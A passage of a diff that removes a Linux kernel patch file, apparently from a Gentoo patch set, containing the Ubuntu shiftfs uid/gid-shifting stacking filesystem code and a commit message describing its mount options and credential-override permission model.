-+	if (cred)
-+		cred = override_creds(cred);
-+	else
-+		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+
-+	return cred;
-+}
-+
-+static void shiftfs_old_creds(const struct cred *oldcred,
-+			      const struct cred **newcred)
-+{
-+	if (!*newcred)
-+		return;
-+
-+	revert_creds(oldcred);
-+	put_cred(*newcred);
-+}
-+
-+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+{
-+	char *p;
-+	substring_t args[MAX_OPT_ARGS];
-+
-+	ssi->mark = false;
-+
-+	while ((p = strsep(&options, ",")) != NULL) {
-+		int token;
-+
-+		if (!*p)
-+			continue;
-+
-+		token = match_token(p, tokens, args);
-+		switch (token) {
-+		case OPT_MARK:
-+			ssi->mark = true;
-+			break;
-+		default:
-+			return -EINVAL;
-+		}
-+	}
-+	return 0;
-+}
-+
-+static void shiftfs_d_release(struct dentry *dentry)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	dput(real);
-+}
-+
-+static struct dentry *shiftfs_d_real(struct dentry *dentry,
-+				     const struct inode *inode)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (unlikely(real->d_flags & DCACHE_OP_REAL))
-+		return real->d_op->d_real(real, real->d_inode);
-+
-+	return real;
-+}
-+
-+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		return 1;
-+
-+	return real->d_op->d_weak_revalidate(real, flags);
-+}
-+
-+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int ret;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	/*
-+	 * inode state of underlying changed from positive to negative
-+	 * or vice versa; force a lookup to update our view
-+	 */
-+	if (d_is_negative(real) != d_is_negative(dentry))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
-+		return 1;
-+
-+	ret = real->d_op->d_revalidate(real, flags);
-+
-+	if (ret == 0 && !(flags & LOOKUP_RCU))
-+		d_invalidate(real);
-+
-+	return ret;
-+}
-+
-+static const struct dentry_operations shiftfs_dentry_ops = {
-+	.d_release	= shiftfs_d_release,
-+	.d_real		= shiftfs_d_real,
-+	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_weak_revalidate = shiftfs_d_weak_revalidate,
-+};
-+
-+static int shiftfs_readlink(struct dentry *dentry, char __user *data,
-+			    int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	const struct inode_operations *iop = real->d_inode->i_op;
-+
-+	if (iop->readlink)
-+		return iop->readlink(real, data, flags);
-+
-+	return -EINVAL;
-+}
-+
-+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
-+				    struct delayed_call *done)
-+{
-+	if (dentry) {
-+		struct dentry *real = dentry->d_fsdata;
-+		struct inode *reali = real->d_inode;
-+		const struct inode_operations *iop = reali->i_op;
-+		const char *res = ERR_PTR(-EPERM);
-+
-+		if (iop->get_link)
-+			res = iop->get_link(real, reali, done);
-+
-+		return res;
-+	} else {
-+		/* RCU lookup not supported */
-+		return ERR_PTR(-ECHILD);
-+	}
-+}
-+
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err = -EOPNOTSUPP;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_setxattr(real, name, value, size, flags);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_get(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, void *value, size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_getxattr(real, name, value, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
-+				 size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_listxattr(real, list, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_removexattr(real, name);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, const void *value, size_t size,
-+			     int flags)
-+{
-+	if (!value)
-+		return shiftfs_removexattr(dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+}
-+
-+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+{
-+	struct inode *reali;
-+
-+	if (!dentry)
-+		return;
-+
-+	reali = dentry->d_inode;
-+
-+	if (!reali->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	inode->i_mapping = reali->i_mapping;
-+	inode->i_private = dentry;
-+}
-+
-+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
-+			       umode_t mode, const char *symlink,
-+			       struct dentry *hardlink, bool excl)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+	bool op_ok = false;
-+
-+	if (hardlink) {
-+		op_ok = iop->link;
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			op_ok = iop->mkdir;
-+			break;
-+		case S_IFREG:
-+			op_ok = iop->create;
-+			break;
-+		case S_IFLNK:
-+			op_ok = iop->symlink;
-+		}
-+	}
-+	if (!op_ok)
-+		return -EINVAL;
-+
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
-+	if (!newi)
-+		return -ENOMEM;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	err = -EINVAL;		/* shut gcc up about uninit var */
-+	if (hardlink) {
-+		struct dentry *realhardlink = hardlink->d_fsdata;
-+
-+		err = vfs_link(realhardlink, reali, new, NULL);
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			err = vfs_mkdir(reali, new, mode);
-+			break;
-+		case S_IFREG:
-+			err = vfs_create(reali, new, mode, excl);
-+			break;
-+		case S_IFLNK:
-+			err = vfs_symlink(reali, new, symlink);
-+		}
-+	}
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		goto out_dput;
-+
-+	shiftfs_fill_inode(newi, new);
-+
-+	d_instantiate(dentry, newi);
-+
-+	new = NULL;
-+	newi = NULL;
-+
-+ out_dput:
-+	dput(new);
-+	iput(newi);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+			  umode_t mode,  bool excl)
-+{
-+	mode |= S_IFREG;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+}
-+
-+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+			 umode_t mode)
-+{
-+	mode |= S_IFDIR;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+}
-+
-+static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
-+			struct dentry *dentry)
-+{
-+	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+			   const char *symlink)
-+{
-+	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+}
-+
-+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	if (rmdir)
-+		err = vfs_rmdir(reali, new);
-+	else
-+		err = vfs_unlink(reali, new, NULL);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, false);
-+}
-+
-+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, true);
-+}
-+
-+static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+			  struct inode *newdir, struct dentry *new,
-+			  unsigned int flags)
-+{
-+	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
-+		*realold = old->d_fsdata,
-+		*realnew = new->d_fsdata, *trap;
-+	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	int err = -EINVAL;
-+	const struct cred *oldcred, *newcred;
-+
-+	trap = lock_rename(rndd, rodd);
-+
-+	if (trap == realold || trap == realnew)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
-+
-+	err = vfs_rename(realolddir, realold, realnewdir,
-+			 realnew, NULL, flags);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+ out_unlock:
-+	unlock_rename(rndd, rodd);
-+
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
-+				     unsigned int flags)
-+{
-+	struct dentry *real = dir->i_private, *new;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock(reali);
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	if (IS_ERR(new))
-+		return new;
-+
-+	dentry->d_fsdata = new;
-+
-+	newi = NULL;
-+	if (!new->d_inode)
-+		goto out;
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
-+	if (!newi) {
-+		dput(new);
-+		return ERR_PTR(-ENOMEM);
-+	}
-+
-+ out:
-+	return d_splice_alias(newi, dentry);
-+}
-+
-+static int shiftfs_permission(struct inode *inode, int mask)
-+{
-+	struct dentry *real = inode->i_private;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	if (mask & MAY_NOT_BLOCK)
-+		return -ECHILD;
-+
-+	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
-+	if (iop->permission)
-+		err = iop->permission(reali, mask);
-+	else
-+		err = generic_permission(reali, mask);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct iattr newattr = *attr;
-+	const struct cred *oldcred, *newcred;
-+	struct super_block *sb = dentry->d_sb;
-+	int err;
-+
-+	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
-+	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	inode_lock(reali);
-+	if (iop->setattr)
-+		err = iop->setattr(real, &newattr);
-+	else
-+		err = simple_setattr(real, &newattr);
-+	inode_unlock(reali);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		return err;
-+
-+	/* all OK, reflect the change on our inode */
-+	setattr_copy(d_inode(dentry), attr);
-+	return 0;
-+}
-+
-+static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+			   u32 request_mask, unsigned int query_flags)
-+{
-+	struct inode *inode = path->dentry->d_inode;
-+	struct dentry *real = path->dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
-+	int err = 0;
-+
-+	if (iop->getattr)
-+		err = iop->getattr(&newpath, stat, request_mask, query_flags);
-+	else
-+		generic_fillattr(reali, stat);
-+
-+	if (err)
-+		return err;
-+
-+	/* transform the underlying id */
-+	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
-+	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	return 0;
-+}
-+
-+static const struct inode_operations shiftfs_inode_ops = {
-+	.lookup		= shiftfs_lookup,
-+	.getattr	= shiftfs_getattr,
-+	.setattr	= shiftfs_setattr,
-+	.permission	= shiftfs_permission,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.get_link	= shiftfs_get_link,
-+	.readlink	= shiftfs_readlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.create		= shiftfs_create,
-+	.mknod		= NULL,	/* no special files currently */
-+	.listxattr	= shiftfs_listxattr,
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry)
-+{
-+	struct inode *inode;
-+
-+	inode = new_inode(sb);
-+	if (!inode)
-+		return NULL;
-+
-+	/*
-+	 * our inode is completely vestigial.  All lookups, getattr
-+	 * and permission checks are done on the underlying inode, so
-+	 * what the user sees is entirely from the underlying inode.
-+	 */
-+	mode &= S_IFMT;
-+
-+	inode->i_ino = get_next_ino();
-+	inode->i_mode = mode;
-+	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+
-+	inode->i_op = &shiftfs_inode_ops;
-+
-+	shiftfs_fill_inode(inode, dentry);
-+
-+	return inode;
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	if (ssi->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
-+	if (err)
-+		return err;
-+
-+	buf->f_type = sb->s_magic;
-+
-+	return 0;
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	mntput(ssi->mnt);
-+	put_user_ns(ssi->userns);
-+	kfree(ssi);
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	struct shiftfs_data *data = raw_data;
-+	char *name = kstrdup(data->path, GFP_KERNEL);
-+	int err = -ENOMEM;
-+	struct shiftfs_super_info *ssi = NULL;
-+	struct path path;
-+	struct dentry *dentry;
-+
-+	if (!name)
-+		goto out;
-+
-+	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
-+	if (!ssi)
-+		goto out;
-+
-+	err = -EPERM;
-+	err = shiftfs_parse_options(ssi, data->data);
-+	if (err)
-+		goto out;
-+
-+	/* to mark a mount point, must be real root */
-+	if (ssi->mark && !capable(CAP_SYS_ADMIN))
-+		goto out;
-+
-+	/* else to mount a mark, must be userns admin */
-+	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		goto out;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out;
-+
-+	err = -EPERM;
-+
-+	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
-+		err = -ENOTDIR;
-+		goto out_put;
-+	}
-+
-+	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put;
-+	}
-+
-+	if (ssi->mark) {
-+		/*
-+		 * this part is visible unshifted, so make sure no
-+		 * executables that could be used to give suid
-+		 * privileges
-+		 */
-+		sb->s_iflags = SB_I_NOEXEC;
-+		ssi->mnt = path.mnt;
-+		dentry = path.dentry;
-+	} else {
-+		struct shiftfs_super_info *mp_ssi;
-+
-+		/*
-+		 * this leg executes if we're admin capable in
-+		 * the namespace, so be very careful
-+		 */
-+		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
-+			goto out_put;
-+		mp_ssi = path.dentry->d_sb->s_fs_info;
-+		if (!mp_ssi->mark)
-+			goto out_put;
-+		ssi->mnt = mntget(mp_ssi->mnt);
-+		dentry = dget(path.dentry->d_fsdata);
-+		path_put(&path);
-+	}
-+	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	sb->s_fs_info = ssi;
-+	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_op = &shiftfs_super_ops;
-+	sb->s_xattr = shiftfs_xattr_handlers;
-+	sb->s_d_op = &shiftfs_dentry_ops;
-+	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_root->d_fsdata = dentry;
-+
-+	return 0;
-+
-+ out_put:
-+	path_put(&path);
-+ out:
-+	kfree(name);
-+	kfree(ssi);
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
-+				    int flags, const char *dev_name, void *data)
-+{
-+	struct shiftfs_data d = { data, dev_name };
-+
-+	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
-+}
-+
-+static struct file_system_type shiftfs_type = {
-+	.owner		= THIS_MODULE,
-+	.name		= "shiftfs",
-+	.mount		= shiftfs_mount,
-+	.kill_sb	= kill_anon_super,
-+	.fs_flags	= FS_USERNS_MOUNT,
-+};
-+
-+static int __init shiftfs_init(void)
-+{
-+	return register_filesystem(&shiftfs_type);
-+}
-+
-+static void __exit shiftfs_exit(void)
-+{
-+	unregister_filesystem(&shiftfs_type);
-+}
-+
-+MODULE_ALIAS_FS("shiftfs");
-+MODULE_AUTHOR("James Bottomley");
-+MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_LICENSE("GPL v2");
-+module_init(shiftfs_init)
-+module_exit(shiftfs_exit)
-diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
-index 6325d1d0e90f..1f70efb41565 100644
---- a/include/uapi/linux/magic.h
-+++ b/include/uapi/linux/magic.h
-@@ -102,4 +102,6 @@
- #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
- #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
- 
-+#define SHIFTFS_MAGIC		0x6a656a62
-+
- #endif /* __LINUX_MAGIC_H__ */
--- 
-2.39.2
-
-From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-/* Introduction */
-The shiftfs filesystem is implemented as a stacking filesystem. Since it is
-a stacking filesystem it shares concepts with overlayfs and ecryptfs.
-Usually, shiftfs will be stacked upon another filesystem. The filesystem on
-top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
-filesystem it is stacked upon is referred to as "lower filesystem" or
-"underlay".
-
-/* Marked and Unmarked shiftfs mounts */
-To use shiftfs it is necessary that a given mount is marked as shiftable via
-the "mark" mount option. Any mount of shiftfs without the "mark" mount option
-not on top of a shiftfs mount with the "mark" mount option will be refused with
-EPERM.
-After a marked shiftfs mount has been performed other shiftfs mounts
-referencing the marked shiftfs mount can be created. These secondary shiftfs
-mounts are usually what are of interest.
-The marked shiftfs mount will take a reference to the underlying mountpoint of
-the directory it is marking as shiftable. Any unmarked shiftfts mounts
-referencing this marked shifts mount will take a second reference to this
-directory as well. This ensures that the underlying marked shiftfs mount can be
-unmounted thereby dropping the reference to the underlying directory without
-invalidating the mountpoint of said directory since the non-marked shiftfs
-mount still holds another reference to it.
-
-/* Stacking Depth */
-Shiftfs tries to keep the stack as flat as possible to avoid hitting the
-kernel enforced filesystem stacking limit.
-
-/* Permission Model */
-When the mark shiftfs mount is created shiftfs will record the credentials of
-the creator of the super block and stash it in the super block. When other
-non-mark shiftfs mounts are created that reference the mark shiftfs mount they
-will stash another reference to the creators credentials. Before calling into
-the underlying filesystem shiftfs will switch to the creators credentials and
-revert to the original credentials after the underlying filesystem operation
-returns.
-
-/* Mount Options */
-- mark
-  When set the mark mount option indicates that the mount in question is
-  allowed to be shifted. Since shiftfs it mountable in by user namespace root
-  non-initial user namespace this mount options ensures that the system
-  administrator has decided that the marked mount is safe to be shifted.
-  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
-- passthrough={0,1,2,3}
-  This mount options functions as a bitmask. When set to a non-zero value
-  shiftfs will try to act as an invisible shim sitting on top of the
-  underlying filesystem.
-  - 1: Shifts will report the filesystem type of the underlay for stat-like
-       system calls.
-  - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay.
-  - 3: Shiftfs will both use 1 and 2.
-Note that mount options on a marked mount cannot be changed.
-
-/* Extended Attributes */
-Shiftfs will make sure to translate extended attributes.
-
-/* Inodes Numbers */
-Shiftfs inodes numbers are copied up from the underlying filesystem, i.e.
-shiftfs inode numbers will be identical to the corresponding underlying
-filesystem's inode numbers. This has the advantage that inotify and friends
-should work out of the box.
-(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
- dentries and inodes.)
-
-/* Device Support */
-Shiftfs only supports the creation of pipe and socket devices. Character and
-block devices cannot be created through shiftfs.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig   |   10 +
- fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
- 2 files changed, 1493 insertions(+), 369 deletions(-)
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index b53bece1e940..ada9a1234e72 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -136,6 +136,16 @@ config SHIFT_FS
- 	  unprivileged containers can use this to mount root volumes
- 	  using this technique.
- 
-+config SHIFT_FS_POSIX_ACL
-+	bool "shiftfs POSIX Access Control Lists"
-+	depends on SHIFT_FS
-+	select FS_POSIX_ACL
-+	help
-+	  POSIX Access Control Lists (ACLs) support permissions for users and
-+	  groups beyond the owner/group/world scheme.
-+
-+	  If you don't know what Access Control Lists are, say N.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f7cada126daa..ad1ae5bce6c1 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,3 +1,4 @@
-+#include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
- #include <linux/file.h>
-@@ -7,83 +8,179 @@
- #include <linux/kernel.h>
- #include <linux/magic.h>
- #include <linux/parser.h>
-+#include <linux/security.h>
- #include <linux/seq_file.h>
- #include <linux/statfs.h>
- #include <linux/slab.h>
- #include <linux/user_namespace.h>
- #include <linux/uidgid.h>
- #include <linux/xattr.h>
-+#include <linux/posix_acl.h>
-+#include <linux/posix_acl_xattr.h>
-+#include <linux/uio.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
- 	struct user_namespace *userns;
-+	/* creds of process who created the super block */
-+	const struct cred *creator_cred;
- 	bool mark;
-+	unsigned int passthrough;
-+	struct shiftfs_super_info *info_mark;
- };
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry);
-+struct shiftfs_file_info {
-+	struct path realpath;
-+	struct file *realfile;
-+};
-+
-+struct kmem_cache *shiftfs_file_info_cache;
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry);
-+
-+#define SHIFTFS_PASSTHROUGH_NONE 0
-+#define SHIFTFS_PASSTHROUGH_STAT 1
-+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+
-+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	return true;
-+}
- 
- enum {
- 	OPT_MARK,
-+	OPT_PASSTHROUGH,
- 	OPT_LAST,
- };
- 
- /* global filesystem options */
- static const match_table_t tokens = {
- 	{ OPT_MARK, "mark" },
-+	{ OPT_PASSTHROUGH, "passthrough=%u" },
- 	{ OPT_LAST, NULL }
- };
- 
--static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+static const struct cred *shiftfs_override_creds(const struct super_block *sb)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct cred *cred = prepare_creds();
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 
--	if (!cred)
--		return NULL;
-+	return override_creds(sbinfo->creator_cred);
-+}
-+
-+static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
-+					       struct cred *newcred)
-+{
-+	revert_creds(oldcred);
-+	put_cred(newcred);
-+}
-+
-+static int shiftfs_override_object_creds(const struct super_block *sb,
-+					 const struct cred **oldcred,
-+					 struct cred **newcred,
-+					 struct dentry *dentry, umode_t mode,
-+					 bool hardlink)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	if (!hardlink) {
-+		int err = security_dentry_create_files_as(dentry, mode,
-+							  &dentry->d_name,
-+							  *oldcred, *newcred);
-+		if (err) {
-+			shiftfs_revert_object_creds(*oldcred, *newcred);
-+			return err;
-+		}
-+	}
- 
--	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
--	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
--	put_user_ns(cred->user_ns);
--	cred->user_ns = get_user_ns(ssi->userns);
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
- 
--	return cred;
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
- }
- 
--static const struct cred *shiftfs_new_creds(const struct cred **newcred,
--					    struct super_block *sb)
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
- {
--	const struct cred *cred = shiftfs_get_up_creds(sb);
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
- 
--	*newcred = cred;
-+static void shiftfs_copyattr(struct inode *from, struct inode *to)
-+{
-+	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = to->i_sb->s_user_ns;
-+
-+	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
-+	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
-+	to->i_mode = from->i_mode;
-+	to->i_atime = from->i_atime;
-+	to->i_mtime = from->i_mtime;
-+	to->i_ctime = from->i_ctime;
-+	i_size_write(to, i_size_read(from));
-+}
- 
--	if (cred)
--		cred = override_creds(cred);
--	else
